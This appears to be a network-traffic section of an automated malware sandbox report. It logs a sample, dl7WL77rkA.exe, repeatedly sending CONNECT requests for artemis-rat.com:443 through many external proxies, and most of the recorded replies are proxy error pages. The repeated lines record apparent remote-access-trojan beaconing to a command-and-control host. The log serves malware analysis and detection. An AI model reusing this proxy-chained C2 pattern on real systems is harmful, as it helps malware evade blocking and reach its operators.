                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            228192.168.2.550766202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.549994946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            229192.168.2.550537159.65.233.11580003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.550009012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.773946047 CET32INHTTP/1.0 504 Gateway Timeout


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            230192.168.2.550772202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.553934097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            231192.168.2.55046661.111.38.5803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.554408073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.860518932 CET507INHTTP/1.1 502 Proxy Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Content-Length: 341
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            232192.168.2.550614104.20.34.100803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.556761026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.711235046 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            233192.168.2.550773202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.558806896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            234192.168.2.5504855.61.33.234803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.566850901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.868489027 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            235192.168.2.550462181.212.136.3475183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.571228981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.264210939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.264337063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405147076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405554056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468167067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            236192.168.2.54984051.89.173.40545703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.575664043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592519999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.593162060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592766047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.592717886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            237192.168.2.550248117.160.250.13088993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.577941895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.246047020 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.258116007 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            238192.168.2.550640104.24.136.68803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.582714081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.737564087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            239192.168.2.55061312.186.205.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.592190027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            240192.168.2.550648104.18.254.76803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.593070984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.748002052 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            241192.168.2.54982043.255.113.23280823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.593079090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592519999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.593162060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592777967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.592717886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            242192.168.2.55046547.100.91.5780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.595169067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.946063042 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
